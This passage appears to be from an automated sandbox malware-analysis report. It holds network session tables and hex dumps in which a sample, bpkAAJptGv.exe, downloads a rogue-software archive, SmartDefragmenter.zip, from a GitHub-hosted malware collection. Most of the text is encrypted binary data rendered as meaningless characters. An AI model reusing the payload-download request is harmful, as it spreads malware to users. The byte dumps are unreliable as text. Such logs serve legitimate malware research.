                                                                                                                                                            2022-09-29 12:44:48 UTC598INData Raw: 34 f0 2d 6d 16 93 6a a8 86 2a 58 27 f5 b0 a2 75 3d 3e 7c 7b 29 13 b1 9e 1e 00 82 ac fe d3 ce 95 b2 03 ad 7b 3b f0 a5 b5 40 87 6b 44 2e 2c 9f 3d a5 23 28 5a ed 57 35 1c ce a8 ae 49 21 14 c8 b6 06 95 09 7f 2f 45 77 69 cf 96 ba b0 57 04 83 94 c5 6b e6 2c 38 04 b0 2e eb 97 1f 19 28 e0 4b c2 9b 47 9f be 24 2f e9 72 53 39 9f ba 2b 13 35 26 a4 b2 a1 71 50 ea d7 44 ca 39 38 49 c8 7a b0 9b 6f 07 4a e1 7f ff 56 6a c9 0d 78 40 80 d0 a9 7f 2b 18 21 ae 44 91 a0 ab 92 33 81 e4 8b ff 91 0e 31 3a 21 d7 cb 19 48 81 50 81 e1 87 78 8f 20 64 06 65 15 74 d0 51 f8 1f db 56 77 2d b4 26 cb ce c0 f3 92 3a 33 b8 5f 69 49 03 55 94 6d cd cd 9b 0a f6 b0 1f 8d 1a 74 60 5c 24 33 1f e1 11 d5 8d 78 ed 5f 33 db 55 b4 5a 29 92 91 b7 63 65 fa 6e 52 2e 9a 4a bf d0 f9 ef d6 7a eb 7e b5 00 97
                                                                                                                                                            Data Ascii: 4-mj*X'u=>|{){;@kD.,=#(ZW5I!/EwiWk,8.(KG$/rS9+5&qPD98IzoJVjx@+!D31:!HPx detQVw-&:3_iIUmt`\$3x_3UZ)cenR.Jz~
                                                                                                                                                            2022-09-29 12:44:48 UTC614INData Raw: 2d 67 2b 7a 35 f6 39 84 36 e6 31 95 75 06 16 70 d5 45 a3 39 c6 54 aa 60 18 de b4 b3 f3 92 f5 ed 19 47 e8 59 fc 0e a9 ba 5a 6e 6e 98 e9 7a 9f d6 f0 62 74 4d 8f 19 7a a8 8d bf cd ca 1f 7d 12 35 6a 8b 06 8a 53 6c ac 6d 6d 9a 7c 30 70 8e b7 89 8a ed 82 dc 45 95 97 d0 75 f3 ad 68 cf 21 67 a4 ad f3 ee e8 53 94 3b 51 18 18 f7 a0 63 80 f9 be 98 33 ef 1b 85 12 a7 86 46 13 72 53 99 0a 77 e3 df 2c 08 bd aa 6e 0e b9 9b 13 58 23 3f 52 ae ed e9 56 53 af d0 c5 23 70 b6 fb 8e 97 65 87 c4 05 f2 4c ed 07 64 56 e1 cc 53 47 e6 7f 7c b5 68 bc ef 45 03 bd f3 e3 df d3 f6 95 0a 2b 87 68 15 e6 64 48 ad 53 60 de e9 59 53 cd 08 c1 19 52 f1 4d f8 3c 08 6b a1 7e 16 b7 33 fb 5d 0e 9f fe 80 df 4d cf f9 6d ae b0 71 6c ae b6 4d dc ac 67 df 6c 7b ed 71 f4 d5 52 ff 09 60 02 bc e9 60 a7 71
                                                                                                                                                            Data Ascii: -g+z5961upE9T`GYZnnzbtMz}5jSlmm|0pEuh!gS;Qc3FrSw,nX#?RVS#peLdVSG|hE+hdHS`YSRM<k~3]MmqlMgl{qR``q
                                                                                                                                                            2022-09-29 12:44:48 UTC630INData Raw: 55 80 87 71 a1 71 15 5d ec 72 a4 aa 70 80 94 33 e3 88 c9 82 30 4b 70 dd 66 d0 bc 94 59 f5 6d c7 1a c3 51 26 62 cb 0b a3 20 62 7d 1d 6b 43 c7 d4 74 ee 56 26 25 c8 d3 01 c3 74 e8 7d bd c0 1c 4b 66 a6 0e 3e 83 df 2e 36 85 4d 46 ad dc e8 55 52 62 cf 73 a1 65 29 9c 13 92 f0 84 9e 8a c2 90 83 56 b6 28 9b cd 63 31 18 cf ee 75 19 16 e9 58 fb 78 26 5f 6f 19 cc d8 ae 50 44 9c 7d 97 23 bb fb 72 e9 e9 44 14 aa 19 42 ec 33 ea 7c 51 35 49 65 32 f6 e4 e9 28 1c 82 d3 24 aa d0 dd dc 9b 05 48 ec 94 67 1d 3a 52 58 b1 99 c4 9f 93 a7 17 02 26 d6 35 fb 9d c7 80 a5 4c f4 5a 9e 1e d9 f6 b1 f9 6f 2c a4 e8 57 f5 18 9b 4f e8 1c 8e 29 ec 5f 76 a6 c2 36 29 b1 56 f6 f8 54 a4 cb 17 de 73 99 a2 26 7a bd 49 0a 64 16 39 60 ef 2e 64 2b 45 84 2d b0 7e 9d 66 fa 43 f9 6c bc cc 5f 93 af 3f 1e
                                                                                                                                                            Data Ascii: Uqq]rp30KpfYmQ&b b}kCtV&%t}Kf>.6MFURbse)V(c1uXx&_oPD}#rDB3|Q5Ie2($Hg:RX&5LZo,WO)_v6)VTs&zId9`.d+E-~fCl_?
                                                                                                                                                            2022-09-29 12:44:48 UTC646INData Raw: 89 84 13 85 a1 7b 72 38 0d 79 82 1f 21 ab 93 76 8b 71 80 0f 61 27 4e 5f 2a bb 03 85 07 01 97 8e c3 c3 b5 f1 d5 fa 28 58 7f 74 21 c8 8e 4f 36 90 bd eb c5 1b 6d fd 81 f1 ba 53 c2 a4 a5 b8 4e 9f 6f 10 3d 11 e4 37 1c 06 ba d4 ac e3 f0 1e 4e 07 e9 57 02 43 b6 db 5e 07 9c 6b cf 5f 26 a6 dd 3c ff c6 dc 03 d7 e4 a8 ee 70 4e 3a 5c 03 e4 5b 1c 63 1c a2 38 28 12 10 66 2b a0 61 96 fe 41 0b e5 04 99 26 8e 93 ca 08 ff 55 89 35 03 49 34 22 74 ac 8c 88 63 12 b3 24 b6 9b d6 99 6f 16 8c 8e 74 0c d7 bf 4d 82 16 90 54 6b 6d 7b 67 c4 f3 89 33 9c e7 f8 d6 2c 55 3a 36 3a 11 ed 40 c0 4b 9c c3 40 80 1a df 01 38 6b 6d f9 a0 a0 75 4e 2e 40 52 2c ae e5 89 bd 47 05 0b c3 49 c3 91 41 30 16 0e d4 1a ef 35 cf a7 f4 7e 56 39 a5 33 34 34 96 f4 02 8d 92 77 7b 54 b6 a4 99 ce 06 cd 06 9a ae
                                                                                                                                                            Data Ascii: {r8y!vqa'N_*(Xt!O6mSNo=7NWC^k_&<pN:\[c8(f+aA&U5I4"tc$otMTkm{g3,U:6:@K@8kmuN.@R,GIA05~V9344w{T
                                                                                                                                                            2022-09-29 12:44:48 UTC662INData Raw: 3b 08 84 e1 6b c4 3e 5f 67 fe 11 be bd 29 a3 f0 eb 61 80 83 b5 a4 a6 43 c4 89 97 7b 87 02 6b b5 a8 ae 69 72 04 9a 2a 63 c7 e2 2f 1a 6f 40 60 14 08 1f c1 98 ba 0c 4d 8e df e0 19 94 8f c6 ba df 31 6e d1 a6 25 8d 21 5b 38 39 6b 11 6b f8 4f b3 4a 01 10 3a b7 a5 32 92 d5 42 75 dc 98 54 a2 e7 02 c8 91 56 38 59 c0 35 cb 5a 34 0d 17 a7 ff f7 bf 22 94 49 b4 b1 0b e9 5c d8 2d 20 8f b2 58 45 5c 71 7d 4b 39 26 7e 06 24 05 19 1a 3b a5 cc ec 66 61 43 76 2a 71 00 8d f6 f5 f6 f6 4c a9 e3 63 01 75 43 9c e7 14 14 2e 18 e7 ac 9c be f3 cc 4e 13 4b ab 6b b0 19 bc bb 33 d4 e4 f5 b3 81 d4 5e ee cb 1b c7 da 47 33 d5 06 ff ba b3 d1 49 69 bb 27 d2 85 de ce 1a bd 99 20 63 78 6b ac 38 64 ae f3 54 5b f7 e4 da d4 c4 25 3d 83 d8 14 11 75 48 21 03 5b ae 62 33 49 51 24 31 97 dc 0a fb cf
                                                                                                                                                            Data Ascii: ;k>_g)aC{kir*c/o@`M1n%![89kkOJ:2BuTV8Y5Z4"I\- XE\q}K9&~$;faCv*qLcuC.NKk3^G3Ii' cxk8dT[%=uH![b3IQ$1
                                                                                                                                                            2022-09-29 12:44:48 UTC678INData Raw: af d3 83 a8 89 7d f3 d3 95 c9 7b ec ef 87 c7 4c 8a fd 37 37 58 eb e5 9a 74 24 15 2b f3 b4 44 c2 49 14 45 97 6b 7d 4d fb 68 63 85 b2 04 83 ac d3 8f 65 1c 69 0a e8 93 1e 9d c8 81 4e 4d 0a 0c ea 10 31 53 5c fd db 24 70 62 6f 64 0e 5a a7 6e ab d1 3c 8b 5e cc b1 fc 1b 55 2f e7 9e d2 fc b7 c6 7f 31 35 4d e8 eb 17 13 75 5f 9c 02 2c fe 34 c9 a2 02 1b ed d5 85 ea 3b 83 02 c5 35 22 f7 7b f3 a7 be 70 f9 42 3b b1 dd 7b 35 3f 3a 82 4e 2e 61 3e 5b af 69 e3 5f 11 44 28 3f 50 7d 77 a9 37 ef 8a 7a 98 20 ab c1 05 2a ef 10 55 88 9d e2 f5 71 a8 3a 3a b3 87 32 2b 93 5d 32 1a 69 6c 87 5a da 55 3e 6e 32 13 68 f9 f1 63 fd 15 e1 ee 50 26 3f 08 f3 34 eb ca 57 da 0a 83 79 b7 d4 cb 55 7a 6e af c6 7d b6 0e 20 71 8e 04 d1 e4 fb 4b dd 72 c0 8d 7c 9f 78 33 20 de db a3 07 9b 5e 2c d4 a6
                                                                                                                                                            Data Ascii: }{L77Xt$+DIEk}MhceiNM1S\$pbodZn<^U/15Mu_,4;5"{pB;{5?:N.a>[i_D(?P}w7z *Uq::2+]2ilZU>n2hcP&?4WyUzn} qKr|x3 ^,
                                                                                                                                                            2022-09-29 12:44:48 UTC694INData Raw: 76 71 b8 e1 5e a2 af 5f b8 db 35 47 91 6e 03 43 b1 f8 d7 10 a7 9d 2f 6c aa a8 c5 8d 41 17 10 52 a9 3e 3a 30 7f 27 82 a6 5a c9 94 77 86 44 5a cc 1f 91 db b4 10 78 a2 98 65 24 a1 93 a2 ba 6e 84 48 46 98 11 41 d5 c8 ed e0 9d af dc 05 ad 79 cc b1 66 bd 92 40 4e d7 0f 32 49 f9 a7 ce 74 b6 50 6f d7 73 2c 07 4b 66 af 25 4a 9b 49 25 20 92 d5 01 d9 7c 65 18 c6 ca db 6b 3e da 99 00 53 80 12 d8 18 69 a8 62 09 6e b9 92 68 01 81 d1 4b 6a 00 29 cf 91 61 3c 3d 34 9a 64 ba 97 cf 32 fd 9c 21 65 35 de b3 c3 df 87 21 6f 55 00 68 02 7b 7b aa 1f 4f 5b 12 e5 e4 46 a9 b6 7e e6 2a 2d 0d a9 c8 25 39 44 e2 43 e8 54 56 72 25 23 97 f7 79 44 a3 37 37 bb c0 71 1b 13 a8 d9 4d d9 9e 42 00 1b 3a 78 a6 6d ff be f9 bb ca 0d a1 9a ee a3 b2 2d cc 9e da 7b 35 db 47 c0 4a f5 3e b3 9f f8 cc eb
                                                                                                                                                            Data Ascii: vq^_5GnC/lAR>:0'ZwDZxe$nHFAyf@N2ItPos,Kf%JI% |ek>SibnhKj)a<=4d2!e5!oUh{{O[F~*-%9DCTVr%#yD77qMB:xm-{5GJ>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            130192.168.2.649773140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:27 UTC36828OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            131140.82.121.4443192.168.2.649773C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:28 UTC36829INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:28 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:28 UTC36829INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            132192.168.2.649774185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:28 UTC36831OUTGET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            133185.199.110.133443192.168.2.649774C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:28 UTC36831INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 385789
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "f99f536fb7d24d720adda8a8578921ca78e3e35a963dab866adeac56f6cbe881"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0809:045E:1D056D:1EA8B9:63359368
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:28 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6978-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455528.251358,VS0,VE173
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 651f5e2b515165379b266987db93d9ddcd0919a3
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:28 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:28 UTC36832INData Raw: 50 4b 03 04 33 00 01 00 63 00 29 a0 23 4d 00 00 00 00 21 e2 05 00 00 d8 06 00 20 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 6d 61 72 74 44 65 66 72 61 67 6d 65 6e 74 65 72 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b5 e6 bc 9a 40 a6 39 37 40 93 e2 67 5c 37 17 42 ff d7 79 b2 75 5e 52 47 29 e0 c4 bd 15 5c 4d ac d4 78 5e 56 42 bb c3 ec 6c 60 ed 0e 68 b0 df b3 1d 57 0d 50 38 b4 42 ef ad 3a b5 e3 28 4f 16 a5 f4 f2 56 fc 29 36 e3 83 25 bb 9f ed 3a d8 c5 58 9a 2c db ca c7 27 3c f9 7f 89 be ad 72 42 e9 a6 0f f0 d8 83 95 47 51 25 fa 70 7c e0 b8 70 22 4b 0b 84 68 e2 78 17 bd 74 19 d0 51 9a e8 ab d0 22 b3 6e bf 1d a5 55 92 87 b6 53 e2 96 bc 74 b2 83 ec 9d 3f d3 88 36 14 95 cc d3 8e a1 92 5d 5a e2 0d 7a 08 e8 c2 1c 23 61 aa 28 a8 76 5d 41 aa 5f 52 cd 93 2f a0 a8
                                                                                                                                                            Data Ascii: PK3c)#M! Endermanch@SmartDefragmenter.exeAE@97@g\7Byu^RG)\Mx^VBl`hWP8B:(OV)6%:X,'<rBGQ%p|p"KhxtQ"nUSt?6]Zz#a(v]A_R/
                                                                                                                                                            2022-09-29 12:45:28 UTC36848INData Raw: b7 a7 57 d4 c4 57 ea a4 c8 12 60 5b fd c7 1a 51 fe 2b de 75 60 61 82 4f 8d 37 ad 6a 1d 23 d3 f4 71 9c 4b ea f5 d0 04 84 65 14 b1 be 7c 88 f6 35 1b f0 0b c5 27 f9 35 27 48 d2 4a 1b 7e e3 04 df 59 ea 83 ba 89 71 b3 81 1e 4f d2 d9 a8 2b 79 ea 4f 54 7c 88 9d 57 e2 d8 0c 4d d6 f5 10 d3 da 90 a5 f2 e5 59 3b 0d 07 e6 4a 34 02 c5 d9 f1 d2 92 6e ea 46 98 68 6e 00 94 05 5a 2a 2f 2a 09 28 ce 9b fa 68 ee 39 ef 88 fb 3d ad d8 70 d5 ea 87 28 a6 39 00 02 8d bb 69 bf 72 32 f1 08 13 b0 28 10 8e b4 76 c8 5e c2 35 aa 28 34 82 64 0c f4 c7 e1 e3 2d 3b c8 f8 00 01 d3 d1 d3 92 85 48 d4 8c 56 37 ec 5c 5c cc 40 81 97 62 18 df e3 18 1a e4 66 d9 cb a3 10 4b 2b 18 ff 4a 3d 6e c7 a5 58 3a b0 b9 0c 72 74 7e 66 86 f0 f5 ab bc 49 67 69 c1 1a a4 96 ff da 03 d9 fb 6d ac 1c eb 95 d6 ef fc
                                                                                                                                                            Data Ascii: WW`[Q+u`aO7j#qKe|5'5'HJ~YqO+yOT|WMY;J4nFhnZ*/*(h9=p(9ir2(v^5(4d-;HV7\\@bfK+J=nX:rt~fIgim
                                                                                                                                                            2022-09-29 12:45:28 UTC36864INData Raw: 93 cb 04 a7 50 2e 9a 7c 5b c3 7e 33 3b 65 4e fa 3c a8 b3 65 67 6a 9d c5 c8 b1 c5 21 94 b9 0b 09 29 ed 3c cb c9 24 d0 eb 1e 7e 26 d6 f1 48 f8 3f d7 ff a2 4d e1 06 2f 3e 6f 3b 34 03 ab d0 e8 5a cd f4 01 23 fa 2c 7c 4f d6 04 b2 c6 7e 84 5e 76 be bf 6d 57 73 52 dc e3 9b 7e 88 ab 59 48 5d 23 d0 d5 14 a3 c5 c0 d9 56 bd 65 35 c8 47 53 52 97 29 2b f4 c1 c3 21 57 ef 3b 3e af d1 1b 50 66 f5 c9 77 90 f8 94 1d 26 05 4a 84 3b 74 2b 8c 7e e5 1b 01 79 75 d9 cc e5 c5 2f b1 2c 58 26 19 ee 05 01 63 5f 1c 1f e0 c0 82 6c 83 a7 a6 e0 bf 10 59 dd 42 72 fb a0 13 e2 91 ae c3 41 74 f5 cd 15 38 36 9f 1f cb a4 a0 d6 2c c2 1c 1a 24 62 1b fe a3 fc bd cc 7d be 63 30 e8 79 b9 29 fd c7 81 4a d8 a1 2a 5e c7 81 ce 6b 5e 43 9b 0e 48 6d 4c 11 ff 9d 6a 05 e4 d7 5e 9e 61 16 38 a3 92 a6 1c f5
                                                                                                                                                            Data Ascii: P.|[~3;eN<egj!)<$~&H?M/>o;4Z#,|O~^vmWsR~YH]#Ve5GSR)+!W;>Pfw&J;t+~yu/,X&c_lYBrAt86,$b}c0y)J*^k^CHmLj^a8
                                                                                                                                                            2022-09-29 12:45:28 UTC36880INData Raw: ce e7 5f 14 de 76 96 79 ee 3b 43 89 7c 3d 8f ed b5 a3 8c e1 4e cc 5b 6d 74 cc c4 96 cd 8f cc ad 5d aa 08 7b 4c 11 bb 24 e9 62 64 17 d7 ca 50 e8 e5 ae 0b 17 86 9d 47 25 9a 07 c1 40 5a 5e b7 42 5c b0 15 a7 ff 11 c9 4f 3a 2e 28 a1 84 51 2a d3 08 e1 35 4a e7 6e f8 98 98 d5 eb 84 99 16 16 e4 19 5b 79 cf 45 f1 01 57 66 18 72 58 43 51 24 a6 65 8b 49 9e c0 2b 28 02 d7 97 62 07 3d 6f 27 b0 52 ee 71 7c 94 c7 99 86 d8 c8 af e8 68 6f ed b5 00 f0 90 b7 b0 50 6f ea a3 11 68 8f 33 de e4 02 be 89 82 4c 70 86 a0 63 8d 97 72 7f df e5 0e 00 be 6c 26 06 58 cc bf 72 de bc f9 98 47 6b cc 20 9b 67 14 3a 4b c9 82 d3 f5 df 2f 23 7d 7e 2e 0a 83 23 22 12 68 a5 fa fc 8b ee 71 18 74 96 98 c1 e0 93 6c 7d 6e 68 a8 76 3c 49 27 7a 52 fc 52 1c 8b a3 88 d8 79 de 96 74 0f 4d 77 8e f8 4f 52
                                                                                                                                                            Data Ascii: _vy;C|=N[mt]{L$bdPG%@Z^B\O:.(Q*5Jn[yEWfrXCQ$eI+(b=o'Rq|hoPoh3Lpcrl&XrGk g:K/#}~.#"hqtl}nhv<I'zRRytMwOR
                                                                                                                                                            2022-09-29 12:45:28 UTC36896INData Raw: 0c 71 00 63 4d e5 c3 f0 83 e1 c2 24 c3 f9 a5 7a e8 da 92 8b 67 2c a0 a8 d3 b2 a8 98 a1 66 35 f1 15 79 43 04 f1 fb 90 66 e2 15 c8 96 c2 40 55 2a 6a 80 26 16 aa 4e d7 d3 b2 db 87 52 75 dd a5 9c b5 90 04 8a 59 69 52 4d f7 d9 98 51 d6 b7 f0 81 c1 d8 bf 78 59 22 2e e0 fb d9 e5 f6 09 ac 3a 66 dd c8 6d c6 0a ee 80 7b dc 64 88 16 79 88 47 d8 95 58 8a 5c 38 fd c4 e2 ee 18 85 dc 54 37 d6 4a b5 8e b6 b8 7c 07 f2 96 62 c9 c3 47 22 0f 46 3b 04 6f 37 88 d9 e6 ce 43 6f 7e 09 fb 69 6b 3b 40 ab e7 ea 04 9b 96 21 d2 dc fe f7 1f 61 80 6e 31 3a ad a7 85 10 e6 48 c2 f8 ef 70 63 0e 97 83 e9 4d 7e c2 d9 d3 b1 f8 6d 86 9f 9c af d3 8e c3 a6 22 61 f4 c1 34 c6 79 4d 2b 54 1b b0 db 55 46 16 e4 84 ab c6 28 c2 d8 b4 0e 99 3d 93 32 ac 96 52 98 18 8a 88 c6 1a 1d 95 d7 ad 87 f4 fe 7b 6f
                                                                                                                                                            Data Ascii: qcM$zg,f5yCf@U*j&NRuYiRMQxY".:fm{dyGX\8T7J|bG"F;o7Co~ik;@!an1:HpcM~m"a4yM+TUF(=2R{o
                                                                                                                                                            2022-09-29 12:45:28 UTC36912INData Raw: f8 d3 3c 29 24 f7 7b 77 82 3e a0 67 f4 c4 98 9d a6 14 de 80 66 1f 69 f5 02 f9 f6 ef f7 6f 36 8e e3 eb 11 93 75 f2 54 a8 be 96 86 9e 17 ea 76 9b eb 8d ed d3 3d 40 3e fb b4 e0 5d 4c 8f ed 69 3e e6 a8 ad d8 9e 36 cf 11 cc 2d e4 64 0c 4b 72 a3 28 47 d7 b4 fc e0 49 d8 0f 6b 1f 18 05 1f 32 d5 fb 0e 8d e3 8a 95 b3 47 2f 9f 24 c7 4c 72 53 7a 77 9d 5d a4 5b 91 74 bc aa 61 37 32 33 97 45 16 56 31 88 f2 79 26 f9 60 7f ba 26 ef 7b b1 b2 bf 66 9d 69 05 f1 9e ed a9 72 c2 d6 4a 46 e2 38 0a 33 0f af d3 27 39 fa 54 aa 97 9d 68 aa 43 83 be 34 56 b4 e2 e7 e9 eb 58 38 e9 cc 33 ed 2c 33 ce c6 dc 37 2d d3 70 2a 04 38 42 af 79 2b 66 9e f6 7e 4c f3 17 f3 78 6a ca a6 a9 f4 ab 2e 75 e2 ff 8b a5 f3 f7 f1 36 37 f8 95 c0 70 39 4b 26 8d e1 d9 ca ab ee e7 93 b2 5a c1 94 d6 91 08 2a 12
                                                                                                                                                            Data Ascii: <)${w>gfio6uTv=@>]Li>6-dKr(GIk2G/$LrSzw][ta723EV1y&`&{firJF83'9ThC4VX83,37-p*8By+f~Lxj.u67p9K&Z*
                                                                                                                                                            2022-09-29 12:45:28 UTC36928INData Raw: 23 58 30 d5 59 ae 4d bb 63 5f 8d 0c 41 d7 de 3c 4f a6 30 02 1d 4c 35 d4 97 d3 6f 32 a9 94 a9 c0 c0 6f 36 6b 88 04 f2 f7 05 a4 56 0e a2 59 dc 5b 9a 3d 7d 6d 5c 0d 79 c9 02 0c 75 eb 45 5e 01 39 ac 9d bb b8 d0 5e 63 81 4f 71 cb f4 12 8e 8e cd b8 58 62 9f 58 37 f3 56 36 1b 50 83 5b 6b 85 05 14 26 8d 11 fc 18 99 e8 ae eb 1b 84 10 3c 08 45 87 49 8e 8c 16 d0 ae f7 87 dc a7 bf 85 18 93 ae 47 f3 e5 77 28 41 30 4e 3a 2f 42 f4 34 a1 38 80 fb 95 9b 50 7b 05 e8 a6 03 27 ab d2 07 a6 23 60 7f 5a 92 2a 97 95 29 5a 96 4a 78 e0 39 f4 3a a9 91 ac db 63 84 47 21 45 53 5e f6 17 5d aa ed 2b 3e db 9a 53 7c 96 aa 78 48 e4 5c 2a 2e f1 2b 6b f8 08 25 26 00 c6 fe d1 82 11 e1 4f 2d 88 2d 7a b1 a7 d2 cb 62 92 8e 78 74 a6 f6 32 0a 49 e2 38 16 8a e7 9a db f4 83 34 9b 34 bb 5f a2 21 46
                                                                                                                                                            Data Ascii: #X0YMc_A<O0L5o2o6kVY[=}m\yuE^9^cOqXbX7V6P[k&<EIGw(A0N:/B48P{'#`Z*)ZJx9:cG!ES^]+>S|xH\*.+k%&O--zbxt2I844_!F
                                                                                                                                                            2022-09-29 12:45:28 UTC36944INData Raw: 26 6b 09 8a 20 2f 1f 4b fb c4 52 bb 7d 8a 0f b1 e7 72 95 4d cb a7 e5 ff b3 9d 92 20 e1 45 65 69 0a a7 30 43 cb 1d cd 13 81 d9 62 bc 63 d4 64 ba 6b 76 39 eb 03 33 9a c3 ef 89 62 d9 f9 d9 56 87 ee 6e a5 ce 58 28 c4 63 43 0f c6 3a 2e c2 3c e7 2c 0a 72 7a 3a 0b 94 9b 68 64 fb d1 67 33 55 c7 c1 d6 82 d8 3e d0 f5 eb 92 05 48 4b 2a d6 9a c3 74 e6 4b 75 2d b6 a8 cf 8a fd 18 5c e1 53 74 07 25 fa b8 c1 18 7b 66 a4 d0 d6 c1 59 b6 da 11 c0 98 6c 63 15 e8 e2 59 b0 84 33 d7 78 72 ae 9f 80 9a 1a 2e 4e 16 42 47 65 5d d8 f6 41 39 a8 eb 6f b4 f5 cb 38 7a 3d 52 63 3f 8e 86 cc a9 ba 0d 6b 22 0f c1 39 52 f6 c0 0d 58 86 53 92 bf 14 8f fc a2 3b fb 4c 5e db ad 63 a5 8d d5 ba c0 86 9c 80 aa 8b fb 31 0e dc e6 e1 18 e2 c4 ea 85 28 0f 00 5a dc 87 3b 6e 4e ca b7 0b 7e 0d 1c 25 57 a5
                                                                                                                                                            Data Ascii: &k /KR}rM Eei0Cbcdkv93bVnX(cC:.<,rz:hdg3U>HK*tKu-\St%{fYlcY3xr.NBGe]A9o8z=Rc?k"9RXS;L^c1(Z;nN~%W
                                                                                                                                                            2022-09-29 12:45:28 UTC36960INData Raw: eb 5c c3 17 73 2a 30 b2 66 a6 7b 35 cd 21 da 4e a1 6e 29 99 01 5c 91 cd cd 04 3c 80 3b 68 98 0b 37 1b b1 4f 5f 01 e7 f6 48 08 eb bf cb 5f 67 26 37 85 5d f2 5c ed f1 3b 72 b4 b1 99 44 57 af 06 54 de bc 14 af ad 3f a8 57 63 59 36 79 aa b3 7f d6 19 8f 1f ae dd 0d e7 43 21 0c 76 cc 52 a7 ea 90 bc 46 29 c5 eb 6a 21 38 7e f5 7e c7 e4 27 8e 25 64 df 9d a0 9b d7 2e 0c db 7a 22 df 81 c3 96 70 29 7c 69 94 d6 c9 3d 31 fc 25 b5 17 44 74 e5 70 10 4b 98 d1 79 c5 f0 16 81 49 3d 93 41 14 f3 22 c8 6a b9 9b cf 50 50 54 6c eb 9e 93 fd 68 b0 f1 0e 91 2c 0e 6e d7 9f a3 e1 c8 56 37 4c ad bb 6e 31 c6 26 4d ca 8d f1 c2 ff bb 02 7d b5 bb 0c 41 42 0b 17 2d d5 72 67 32 5f 03 ef bc be 22 61 df 5d 45 b1 55 b8 c3 39 ac 97 a5 e2 f7 d9 54 8e 01 61 7c 1d e5 c0 13 09 f9 22 bb c4 ad 40 4c
